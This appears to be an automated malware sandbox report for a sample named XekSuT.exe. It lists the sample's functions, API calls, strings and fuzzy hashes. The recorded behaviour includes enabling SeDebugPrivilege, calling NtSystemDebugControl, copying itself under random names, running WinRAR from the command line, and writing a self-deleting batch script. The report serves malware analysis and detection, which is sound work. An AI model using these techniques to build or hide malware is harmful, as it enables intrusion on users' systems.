                                                                                                                Function 003C119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\XekSuT.exe,?,?,?,?,?,?,003C13EF), ref: 003C11AB
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000028,003C13EF,?,?,?,?,?,?,003C13EF), ref: 003C11BB
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(003C13EF,00000000,?,00000010,00000000,00000000), ref: 003C11EB
                                                                                                                • CloseHandle.KERNEL32(003C13EF), ref: 003C11FA
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,003C13EF), ref: 003C1203
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\XekSuT.exe, xrefs: 003C11A5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                                • API String ID: 75692138-472551747
                                                                                                                • Opcode ID: 64821afccfc2a58261b49766948be89fd5facda2b613e0999f5827eb70016f76
                                                                                                                • Instruction ID: 9d076224f8d0be878fd9a1dcf5b3ccd7fee5d45c06eab28bdb0ce571f78ee1d9
                                                                                                                • Opcode Fuzzy Hash: 64821afccfc2a58261b49766948be89fd5facda2b613e0999f5827eb70016f76
                                                                                                                • Instruction Fuzzy Hash: 9A01E4B6900219EFDB01EFE4CD89EAEBBBCFB04305F108469E606E2251D771AF449B50
                                                                                                                Function 003C139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XekSuT.exe), ref: 003C13BC
                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 003C13DA
                                                                                                                • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 003C1448
                                                                                                                  • Part of subcall function 003C119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\XekSuT.exe,?,?,?,?,?,?,003C13EF), ref: 003C11AB
                                                                                                                  • Part of subcall function 003C119F: OpenProcessToken.ADVAPI32(00000000,00000028,003C13EF,?,?,?,?,?,?,003C13EF), ref: 003C11BB
                                                                                                                  • Part of subcall function 003C119F: AdjustTokenPrivileges.ADVAPI32(003C13EF,00000000,?,00000010,00000000,00000000), ref: 003C11EB
                                                                                                                  • Part of subcall function 003C119F: CloseHandle.KERNEL32(003C13EF), ref: 003C11FA
                                                                                                                  • Part of subcall function 003C119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,003C13EF), ref: 003C1203
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\XekSuT.exe, xrefs: 003C13A8
                                                                                                                • SeDebugPrivilege, xrefs: 003C13D3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\XekSuT.exe$SeDebugPrivilege
                                                                                                                • API String ID: 4123949106-1840906038
                                                                                                                • Opcode ID: 555b2cb1baee76b3f8effd19e7130dc1d91bfff2b79c855c48c94673720e4c84
                                                                                                                • Instruction ID: 91a15fa36829aae6b4061a2bb48806baabcb3d4d4c4cf17d94c64a5aa0a1d9cd
                                                                                                                • Opcode Fuzzy Hash: 555b2cb1baee76b3f8effd19e7130dc1d91bfff2b79c855c48c94673720e4c84
                                                                                                                • Instruction Fuzzy Hash: 9B316175D00209EADF62EBA6CC45FEEBBB8EB46704F21806DE505F6142D7309E45DB60
                                                                                                                Function 003C6D00 Relevance: .2, Instructions: 218COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                                                                                • Instruction ID: 8fd2c50f406498a3e98adc455e2f98ba68ecac42621e76a25debc93089c571a9
                                                                                                                • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                                                                                • Instruction Fuzzy Hash: 2081AF71214B418FC729CF29C891AAABBE2EFD5314F148A2DD0EAC7755DB34E809CB44
                                                                                                                Function 003C239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • strstr.MSVCRT ref: 003C23CC
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 003C2464
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 003C2472
                                                                                                                • CloseHandle.KERNEL32(?,00000000,00000000), ref: 003C24A8
                                                                                                                • memset.MSVCRT ref: 003C24B9
                                                                                                                • strrchr.MSVCRT ref: 003C24C9
                                                                                                                • wsprintfA.USER32 ref: 003C24DE
                                                                                                                • strrchr.MSVCRT ref: 003C24ED
                                                                                                                • memset.MSVCRT ref: 003C24F2
                                                                                                                • memset.MSVCRT ref: 003C2505
                                                                                                                • wsprintfA.USER32 ref: 003C2524
                                                                                                                • Sleep.KERNEL32(000007D0), ref: 003C2535
                                                                                                                • Sleep.KERNEL32(000007D0), ref: 003C255D
                                                                                                                • memset.MSVCRT ref: 003C256E
                                                                                                                • wsprintfA.USER32 ref: 003C2585
                                                                                                                • memset.MSVCRT ref: 003C25A6
                                                                                                                • wsprintfA.USER32 ref: 003C25CA
                                                                                                                • Sleep.KERNEL32(000007D0), ref: 003C25D0
                                                                                                                • Sleep.KERNEL32(000007D0,?,?), ref: 003C25E5
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 003C25FC
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 003C2611
                                                                                                                • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 003C2642
                                                                                                                • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 003C265B
                                                                                                                • SetEndOfFile.KERNEL32 ref: 003C266D
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 003C2676
                                                                                                                • RemoveDirectoryA.KERNEL32(?), ref: 003C2681
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                                                                                                • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 2203340711-2169341206
                                                                                                                • Opcode ID: 3b8aceb604e7527aa5752af45c8fe1480ab38d5594d8169adad988536c9ccb64
                                                                                                                • Instruction ID: 8e7a513e4b7698e9fe71a09dd0f4042b40a50bb4d63e4e4aa5cc8511b4c1f4e5
                                                                                                                • Opcode Fuzzy Hash: 3b8aceb604e7527aa5752af45c8fe1480ab38d5594d8169adad988536c9ccb64
                                                                                                                • Instruction Fuzzy Hash: 3481AFB2508344ABD712AF64DC49FABB7ACFB88704F00491EF685D2190D770EE498B66
                                                                                                                Function 003C274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 003C2766
                                                                                                                • memset.MSVCRT ref: 003C2774
                                                                                                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 003C2787
                                                                                                                • wsprintfA.USER32 ref: 003C27AB
                                                                                                                  • Part of subcall function 003C185B: GetSystemTimeAsFileTime.KERNEL32(003C1F92,00000000,?,00000000,?,?,?,003C1F92,?,00000000,00000002), ref: 003C1867
                                                                                                                  • Part of subcall function 003C185B: srand.MSVCRT ref: 003C1878
                                                                                                                  • Part of subcall function 003C185B: rand.MSVCRT ref: 003C1880
                                                                                                                  • Part of subcall function 003C185B: srand.MSVCRT ref: 003C1890
                                                                                                                  • Part of subcall function 003C185B: rand.MSVCRT ref: 003C1894
                                                                                                                • wsprintfA.USER32 ref: 003C27C6
                                                                                                                • CopyFileA.KERNEL32(?,003C4C80,00000000), ref: 003C27D4
                                                                                                                • wsprintfA.USER32 ref: 003C27F4
                                                                                                                  • Part of subcall function 003C1973: PathFileExistsA.SHLWAPI(\N<`N<,00000000,C:\Users\user\AppData\Local\Temp\XekSuT.exe), ref: 003C1992
                                                                                                                  • Part of subcall function 003C1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003C19BA
                                                                                                                  • Part of subcall function 003C1973: Sleep.KERNEL32(00000064), ref: 003C19C6
                                                                                                                  • Part of subcall function 003C1973: wsprintfA.USER32 ref: 003C19EC
                                                                                                                  • Part of subcall function 003C1973: CopyFileA.KERNEL32(?,?,00000000), ref: 003C1A00
                                                                                                                  • Part of subcall function 003C1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C1A1E
                                                                                                                  • Part of subcall function 003C1973: GetFileSize.KERNEL32(?,00000000), ref: 003C1A2C
                                                                                                                  • Part of subcall function 003C1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 003C1A46
                                                                                                                  • Part of subcall function 003C1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 003C1A65
                                                                                                                • DeleteFileA.KERNEL32(?,?,003C4E54,003C4E58), ref: 003C281A
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,003C4E54,003C4E58), ref: 003C2832
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                                                                                                • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                                                                                                • API String ID: 692489704-3961832207
                                                                                                                • Opcode ID: 96ee63655fa08b98fc76511df5d86997b25e1d0743cd111fcc55687e06a44327
                                                                                                                • Instruction ID: ff683cb7a6e5df261a5add46a363deb1c0fc3db772b226cda8816c246b3a29fd
                                                                                                                • Opcode Fuzzy Hash: 96ee63655fa08b98fc76511df5d86997b25e1d0743cd111fcc55687e06a44327
                                                                                                                • Instruction Fuzzy Hash: FF2130B694031C7BEB12E7A49C99FDB776CEB04744F0045A9F645E2042E670AF448BA0
                                                                                                                Function 003C1581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 003C185B: GetSystemTimeAsFileTime.KERNEL32(003C1F92,00000000,?,00000000,?,?,?,003C1F92,?,00000000,00000002), ref: 003C1867
                                                                                                                  • Part of subcall function 003C185B: srand.MSVCRT ref: 003C1878
                                                                                                                  • Part of subcall function 003C185B: rand.MSVCRT ref: 003C1880
                                                                                                                  • Part of subcall function 003C185B: srand.MSVCRT ref: 003C1890
                                                                                                                  • Part of subcall function 003C185B: rand.MSVCRT ref: 003C1894
                                                                                                                • wsprintfA.USER32 ref: 003C15AA
                                                                                                                • wsprintfA.USER32 ref: 003C15C6
                                                                                                                • lstrlen.KERNEL32(?), ref: 003C15D2
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 003C15EE
                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 003C1609
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 003C1612
                                                                                                                • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 003C162D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                                                                                                • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XekSuT.exe$open
                                                                                                                • API String ID: 617340118-1701430585
                                                                                                                • Opcode ID: efa75f7d406b45bc8b5fa1f6f8a42728b547d846a9a2ddba4c84192703946f5b
                                                                                                                • Instruction ID: 126e7da1eaa3a81eaf0d6b134ad34e460b014ba53a197c7079cd9aa960f85c7c
                                                                                                                • Opcode Fuzzy Hash: efa75f7d406b45bc8b5fa1f6f8a42728b547d846a9a2ddba4c84192703946f5b
                                                                                                                • Instruction Fuzzy Hash: EE1173B6A011387FD722A7A59C89EEB7B7CEF59750F044055F94AE3041DA70AF848BB0
                                                                                                                Function 003C120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,003C1400), ref: 003C1226
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 003C122D
                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,003C1400), ref: 003C123F
                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,003C1400), ref: 003C1250
                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\XekSuT.exe,?,?,?,?,003C1400), ref: 003C129E
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\XekSuT.exe,?,?,?,?,003C1400), ref: 003C12B0
                                                                                                                • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\XekSuT.exe,?,?,?,?,003C1400), ref: 003C12F5
                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,003C1400), ref: 003C130A
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\XekSuT.exe, xrefs: 003C1262
                                                                                                                • ZwQuerySystemInformation, xrefs: 003C1212
                                                                                                                • ntdll.dll, xrefs: 003C1219
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\XekSuT.exe$ZwQuerySystemInformation$ntdll.dll
                                                                                                                • API String ID: 1500695312-757463314
                                                                                                                • Opcode ID: d8fb6c8b70f35d431b1c9474ab772f7a5dfcb5451ad6c046008aa2a26f90263e
                                                                                                                • Instruction ID: 58c02a85f0d552b60bccc8a5db811d63a515a73a9ebd8203e787f6729ce1cf43
                                                                                                                • Opcode Fuzzy Hash: d8fb6c8b70f35d431b1c9474ab772f7a5dfcb5451ad6c046008aa2a26f90263e
                                                                                                                • Instruction Fuzzy Hash: 2721F576645321ABD7229B65CC08FABBAACFB87B00F114D1CF946D6241C770EE40D7A5
                                                                                                                Function 003C189D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51processsynchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 003C18B1
                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,74DF0F00,75BF8400), ref: 003C18D3
                                                                                                                • CloseHandle.KERNEL32(I%<), ref: 003C18E9
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003C18F0
                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 003C1901
                                                                                                                • CloseHandle.KERNEL32(?), ref: 003C190A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                                                                                                • String ID: I%<
                                                                                                                • API String ID: 876959470-1201062717
                                                                                                                • Opcode ID: 03970b9fadb1d870836068feff2f221e8487e2fc6b49c773cc48e8f5e047e0d0
                                                                                                                • Instruction ID: 472adfaa1cc35845101af9b5d822df5c61fe8d4246ab7750e4c06ffc54c9d452
                                                                                                                • Opcode Fuzzy Hash: 03970b9fadb1d870836068feff2f221e8487e2fc6b49c773cc48e8f5e047e0d0
                                                                                                                • Instruction Fuzzy Hash: 9E017172901128BBCB226B95DC48DDF7F3DFF85724F108025F916E51A0D6315A18CBA0
                                                                                                                Function 003C2692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,74DEE800,?,?,003C29DB,?,00000001), ref: 003C26A7
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,74DEE800,?,?,003C29DB,?,00000001), ref: 003C26B5
                                                                                                                • lstrlen.KERNEL32(?), ref: 003C26C4
                                                                                                                • ??2@YAPAXI@Z.MSVCRT(-00000005), ref: 003C26CE
                                                                                                                • lstrcpy.KERNEL32(00000004,?), ref: 003C26E3
                                                                                                                • lstrcpy.KERNEL32(?,00000004), ref: 003C271F
                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 003C272D
                                                                                                                • SetEvent.KERNEL32 ref: 003C273C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 41106472-0
                                                                                                                • Opcode ID: 62f7e46abc5de31f85aecf3193b9f2baed82a34885ab6d71ce74f6eab8f47a73
                                                                                                                • Instruction ID: a70f8c72b86d98b068872a0e86086a56fa55e5a13e906fc515faca371dbd1b71
                                                                                                                • Opcode Fuzzy Hash: 62f7e46abc5de31f85aecf3193b9f2baed82a34885ab6d71ce74f6eab8f47a73
                                                                                                                • Instruction Fuzzy Hash: AB118F76500210EFCB23AF69EC88D5B7BADFB84721F168029F85AD7121D770AD85DB60
                                                                                                                Function 003C1B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • srand.MSVCRT ref: 003C1BCD
                                                                                                                • rand.MSVCRT ref: 003C1BD8
                                                                                                                • memset.MSVCRT ref: 003C1C43
                                                                                                                • memcpy.MSVCRT(?,CjQNZOGccPzoeIlyMExymiYOJmbwhkgtDRoVwpTqUYgqXzufLvTCFalyuuPgZHkJPCsGsoKONhBIMkQrnVrtFAiAXxhsKjwaHbWEnXHNDLdbYefcZVWjqdULRIpndSvSFMrSUxBRAEfJzKpGlmeWQDtivBaT,00000006,?,00000000,00000040,?,00000000,00000000,?,00000000,00000002), ref: 003C1C4F
                                                                                                                • lstrcat.KERNEL32(?,.exe), ref: 003C1C5D
                                                                                                                Strings
                                                                                                                • CjQNZOGccPzoeIlyMExymiYOJmbwhkgtDRoVwpTqUYgqXzufLvTCFalyuuPgZHkJPCsGsoKONhBIMkQrnVrtFAiAXxhsKjwaHbWEnXHNDLdbYefcZVWjqdULRIpndSvSFMrSUxBRAEfJzKpGlmeWQDtivBaT, xrefs: 003C1B8A, 003C1B9C, 003C1C15, 003C1C49
                                                                                                                • .exe, xrefs: 003C1C57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcatmemcpymemsetrandsrand
                                                                                                                • String ID: .exe$CjQNZOGccPzoeIlyMExymiYOJmbwhkgtDRoVwpTqUYgqXzufLvTCFalyuuPgZHkJPCsGsoKONhBIMkQrnVrtFAiAXxhsKjwaHbWEnXHNDLdbYefcZVWjqdULRIpndSvSFMrSUxBRAEfJzKpGlmeWQDtivBaT
                                                                                                                • API String ID: 122620767-3124869439
                                                                                                                • Opcode ID: 898de830939479136b6ff5ddfe991487fc5a6bcbabafa1744110884a04304a96
                                                                                                                • Instruction ID: ce2abdf9f6322e182936facb8bd6d68cfd64f41cf63e7c95e587c2a81b2a2690
                                                                                                                • Opcode Fuzzy Hash: 898de830939479136b6ff5ddfe991487fc5a6bcbabafa1744110884a04304a96
                                                                                                                • Instruction Fuzzy Hash: 53216B22E442A06ED31723396C64FAA3F489FA7721F16809DF486CB193D2641DC39360
                                                                                                                Function 003C1319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 003C1334
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 003C133B
                                                                                                                • memset.MSVCRT ref: 003C1359
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcmemset
                                                                                                                • String ID: NtSystemDebugControl$ntdll.dll
                                                                                                                • API String ID: 3137504439-2438149413
                                                                                                                • Opcode ID: a2d30baac50b7aef09bad71d35b38480cc5c2c5efd3fc645ad26383436725a82
                                                                                                                • Instruction ID: e9a430319dc01e33c0ced7f42b62280419003b614d394cca602edbe8b0af0e8e
